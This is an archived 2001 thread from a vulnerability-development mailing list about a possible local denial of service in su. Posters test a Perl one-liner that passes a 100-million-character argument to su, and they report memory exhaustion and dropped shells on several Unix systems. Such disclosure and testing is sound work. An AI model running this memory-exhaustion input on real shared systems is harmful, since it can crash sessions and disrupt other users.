Vulnerability Development mailing list archives

Re: possible su local D.o.S

From: Ron DuFresne <dufresne () winternet com>
Date: Thu, 13 Dec 2001 19:08:59 -0600 (CST)


with bash on irix 5.3:

su `perl -e 'print "A" x 100000000'`



Word too long.


with bash on openbsd 2.9

$ su `perl -e 'print "A" x 100000000'`
Out of memory!
Password:

with bash, linux, older kernel, 2.0.x

$ su `perl -e 'print "A" x 100000000'`


login:

Thanks,

Ron DuFresne

On Thu, 13 Dec 2001, Emre Yildirim wrote:

On my RH 7.2 I tried this :

[hvc@condor hvc] $ su `perl -e 'print "A" x 100000000'`


I get something rather different

% su `perl -e 'print "A" x 100000000'`
zsh: fatal error: out of memory

After 5 seconds the shell just dies, I get a connection closed by remote host
(this is when I ssh into the box).  The system still functions though. 
After Ilog back in, the command is not in .zsh_history for some reason and I can't
recall it pushing the up arrow.


-- 
Emre Yildirim <emre () asper org>
GPG KeyID 0xF9E4A1D1 (pgpkeys.mit.edu)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

Current thread:

possible su local D.o.S H VC (Dec 13)
- Re: possible su local D.o.S Flavio Veloso (Dec 13)
- Re: possible su local D.o.S Michal Zalewski (Dec 13)
- Re: possible su local D.o.S Jose Nazario (Dec 13)
- Re: possible su local D.o.S Blue Boar (Dec 13)
- Re: possible su local D.o.S Robert Freeman (Dec 13)
- Re: possible su local D.o.S Emre Yildirim (Dec 13)
  - Re: possible su local D.o.S White Vampire (Dec 13)
  - Re: possible su local D.o.S Ron DuFresne (Dec 13)
- <Possible follow-ups>
- Re: possible su local D.o.S Frank de Lange (Dec 13)